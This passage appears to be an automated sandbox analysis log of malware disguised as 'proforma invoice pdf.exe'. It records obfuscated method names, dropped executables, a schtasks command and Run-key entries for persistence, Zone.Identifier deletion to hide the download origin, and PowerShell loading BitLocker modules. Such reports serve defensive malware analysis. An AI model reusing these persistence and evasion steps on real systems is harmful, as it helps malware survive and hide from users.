Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, GQbRhLZrZZosOjvGmq.cs	High entropy of concatenated method names: 'QUSG2JdUI1', 'jvYGYZyNvd', 'n09Gqkr4N8', 'gHIGLpifdk', 'INdG37SBMm', 'HZTG19q57o', 'SNFGHV6WRN', 'aVWGZMrE7h', 'iA9GdrQYyZ', 'qVZGFNeiZa'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, fJuPYBrSFms5B01kru.cs	High entropy of concatenated method names: 'ToString', 'Obxj9tLx0K', 'CWljRWoJ7E', 'CwgjIXo3Fc', 'eH5jS0Y3pH', 'kAZjvw4AiG', 'wJojBtC3Qf', 'cpNjwbhvo8', 'vnajlMxQgy', 'lQCjmIhsAr'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, Fa4x6Lm6p0kDv8furr.cs	High entropy of concatenated method names: 'mqmHKiHFfQ', 'LA2H5AcfVP', 'wieHnDiKkd', 'pXyHNBLVji', 'kGvHuJ1rs5', 'tacH6VoYeQ', 'xwlHODoRSO', 'cuZHDomgOE', 'lYpHtEjYA4', 'OGYHQY4CEH'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, w1ovTZgc5m6ggAslks.cs	High entropy of concatenated method names: 'fgbMDT21Rn', 'QANMtDjup8', 'yCYMCCHJ3F', 't3DMRUTLCZ', 'uQ7MS1IiNi', 'g4UMvCcFnj', 'I7rMwgrkEr', 'rZ9MlmR9Ys', 'R81MJ9MP9l', 'KD3M9HZRAv'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, Xtr7DE7w3EVyDP6iJy.cs	High entropy of concatenated method names: 'O5KVFxQJ2q', 'GudVUKcxQK', 'ToString', 'a6AVYQaUvW', 'u1iVqvX02n', 'OIyVLrhv89', 'k2SV35vc4N', 'GM8V1R7VbL', 'LgWVHMEK6M', 'NqDVZhq2O7'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, wqtUbAPocUcXgnlIiT.cs	High entropy of concatenated method names: 'aEEVbWApPs', 'cahViJPbKM', 's4Wxp4ayUU', 'qxexk5Zx9b', 'pILV9hv2s3', 'BFuV4bwl43', 'GuLVgchf96', 'HQ9VaGdSmY', 'yyPVc8Ecga', 'QJtVrQn4Ip'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, THOUJ1q3YIymargbV0.cs	High entropy of concatenated method names: 'Dispose', 'OigketfQOn', 'Huk8RCLSd8', 'hJFjJSidEQ', 'KJbki0hJ8Y', 'AGukzPKW50', 'ProcessDialogKey', 'IBe8pWjQNU', 'jmQ8k9QjFO', 'RZU88ELpew'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, b7IpFZCIbSxxN51h6x.cs	High entropy of concatenated method names: 'S8812wZDpo', 'lj51qFldsD', 'hl713B1CAA', 'rjt1H3Acu1', 'rAV1ZU42Jx', 'h2P3TNUmGu', 'bEZ3PZU3ds', 'TV03XhtkLq', 'bPd3bSL1i2', 'NM63elLcYZ'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, TKpOpmsM0Eb12noJkw.cs	High entropy of concatenated method names: 'j3RkHBaoBH', 'SMSkZrduWs', 'fVskFEqLKN', 'o5CkUuWRYJ', 'j1PkhlNk7I', 'aFZkjIbSxx', 'qTYyrdnGNSCh1ItyNv', 'zeDkOlveccmSUX3rpw', 'xA5kk5pIWb', 'o9hkGQLwhn'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, cgWfmkksQcXIJ6iBSNp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zviEyo2fba', 'g61EfOeNUn', 'LyKEAqS8SK', 'ACcEEGentR', 'DjFEoTgnMD', 'prtE0Ntles', 'vyjEWMWboi'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, XWjQNUeHmQ9QjFOaZU.cs	High entropy of concatenated method names: 'KIcyCOKtUu', 'lHFyRsnBtq', 'BXgyIw5qjG', 'PoYySfdJQY', 'kyMyvg9IXd', 'CORyBCfrXY', 'KOKywOwkvY', 'jOfyll1cFp', 'Y3tymTEIMK', 'TSqyJZ3Vh9'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, XVQRZVwM9Cj0E4C2OM.cs	High entropy of concatenated method names: 'BjVHYyAIkY', 'FiqHLk5du2', 'I8RH1Duu9M', 'uVX1ikMqor', 'krf1zAEqli', 'DE5HpCDw0P', 'lmuHkEBN3A', 'lGWH8pSmZn', 'GqNHGw1Vpv', 'ykUHsds3MF'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, n64sjVa6KIhd4h0fZa.cs	High entropy of concatenated method names: 'BTphJuN301', 'ztph4Mxl97', 'ey1hakmv2S', 'LVkhcY5TTk', 'YSnhRit0Zi', 'JX3hIUrdtT', 'jsJhSyswyj', 'r7Hhv9EjS8', 'ko5hBrDb3g', 'AdGhwx6jv1'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, wyE9JZz739cqAQ1k9N.cs	High entropy of concatenated method names: 'Siuf6rVJkc', 'L0efDj437O', 'tJoftCV82s', 'jOmfCiQ8NY', 'mdQfRT3EvN', 'Ct1fSiqtv1', 'PGJfvEfgq6', 'lP3fWZgdYD', 'xDTfKRjx1T', 'gfvf5RjWcw'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, bo7YTYtVsEqLKNM5Cu.cs	High entropy of concatenated method names: 'zr3LNMaFUE', 'ixTL67QXdE', 'QNbLDCdFPV', 'mOHLtaloUF', 'DkMLh21LLL', 'vDMLjOOx5A', 'u4JLV3P3H8', 'eBTLxCnr5U', 'syBLyHVsCn', 'xiNLfVBUE9'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, GBaoBHDcMSrduWs3oj.cs	High entropy of concatenated method names: 'mRwqag0Mm3', 'LBhqcyKDuJ', 'rbGqrqjOZu', 'KEIq7MNmMM', 'yOQqT2iTrq', 'ApBqPlMFEC', 'G8lqXGCM2m', 'FPaqbSUcrK', 'YIeqeGnTDL', 'L7tqi5kJih'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, xRYJ6TQo5VDMKH1PlN.cs	High entropy of concatenated method names: 'ids3ueXBby', 'mEy3OXMJgv', 'u2ZLIcuLYk', 'p9fLSv8978', 'LbpLvHinNu', 'PERLBACAPp', 'XC0Lw97hiG', 'ifKLlKBeUh', 'Xi4LmyVGy8', 'D2sLJXguWe'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, dfdqZWXagJigtfQOnB.cs	High entropy of concatenated method names: 'EGSyhobYi4', 'gWIyV9TDD1', 'QFfyybRB9i', 'XLjyACsphv', 'CimyoTs43a', 'BuUyWt1ufo', 'Dispose', 'hdoxYPQkrB', 'XBZxq7cpt8', 'TaoxLtXhGI'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, Tly5A2kkRWy5NhIJJ2l.cs	High entropy of concatenated method names: 'y6NfiKdFUy', 'm1UfzcmuP6', 'YKVAp0u9lX', 'BBeAkFdCDS', 'iHBA8pimB2', 'mQ7AGeSUS8', 'QlpAsUk0gs', 'tJmA2Wpot0', 'cmBAYUUkLm', 'qtVAqI43bT'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, x6FDdEkpePPXuV9h0SZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BVsf9gS8nL', 'deuf4GWgJa', 'M7vfgYDXq3', 'yArfatW5Rr', 'EAyfcEy6tE', 'Dp0frr9WRv', 'c6if7Vj4VA'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, SxEwAW806ubANcSZ71.cs	High entropy of concatenated method names: 'QlrnnGOFk', 'TVFNdWS8l', 'PvK6en4YF', 'ARXOrWuTu', 'zdntJyPMu', 'fJ2Q2cgAM', 'gyfgS8hXVIhJn6bIiD', 'LMjco5jjgZvmNfVMnt', 'xqsx8VSD7', 'rJrfhPR3a'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, uLpewfijnYHP5ANMWc.cs	High entropy of concatenated method names: 'vLSfLJ18Co', 'FPkf37Cwcx', 'QMdf1dBXdO', 'WM7fHfJwdQ', 'CHKfyX6uwb', 'bGNfZj67vg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, GQbRhLZrZZosOjvGmq.cs	High entropy of concatenated method names: 'QUSG2JdUI1', 'jvYGYZyNvd', 'n09Gqkr4N8', 'gHIGLpifdk', 'INdG37SBMm', 'HZTG19q57o', 'SNFGHV6WRN', 'aVWGZMrE7h', 'iA9GdrQYyZ', 'qVZGFNeiZa'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, fJuPYBrSFms5B01kru.cs	High entropy of concatenated method names: 'ToString', 'Obxj9tLx0K', 'CWljRWoJ7E', 'CwgjIXo3Fc', 'eH5jS0Y3pH', 'kAZjvw4AiG', 'wJojBtC3Qf', 'cpNjwbhvo8', 'vnajlMxQgy', 'lQCjmIhsAr'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, Fa4x6Lm6p0kDv8furr.cs	High entropy of concatenated method names: 'mqmHKiHFfQ', 'LA2H5AcfVP', 'wieHnDiKkd', 'pXyHNBLVji', 'kGvHuJ1rs5', 'tacH6VoYeQ', 'xwlHODoRSO', 'cuZHDomgOE', 'lYpHtEjYA4', 'OGYHQY4CEH'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, w1ovTZgc5m6ggAslks.cs	High entropy of concatenated method names: 'fgbMDT21Rn', 'QANMtDjup8', 'yCYMCCHJ3F', 't3DMRUTLCZ', 'uQ7MS1IiNi', 'g4UMvCcFnj', 'I7rMwgrkEr', 'rZ9MlmR9Ys', 'R81MJ9MP9l', 'KD3M9HZRAv'
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, Xtr7DE7w3EVyDP6iJy.cs	High entropy of concatenated method names: 'O5KVFxQJ2q', 'GudVUKcxQK', 'ToString', 'a6AVYQaUvW', 'u1iVqvX02n', 'OIyVLrhv89', 'k2SV35vc4N', 'GM8V1R7VbL', 'LgWVHMEK6M', 'NqDVZhq2O7'
Source: 0.2.proforma invoice pdf.exe.72a0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 0.2.proforma invoice pdf.exe.72a0000.3.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	File created: C:\Users\user\AppData\Roaming\wTyVrj.exe			Jump to dropped file
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	File created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp"

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bmBOz			Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bmBOz			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	File opened: C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	File opened: C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe:Zone.Identifier read attributes \| delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
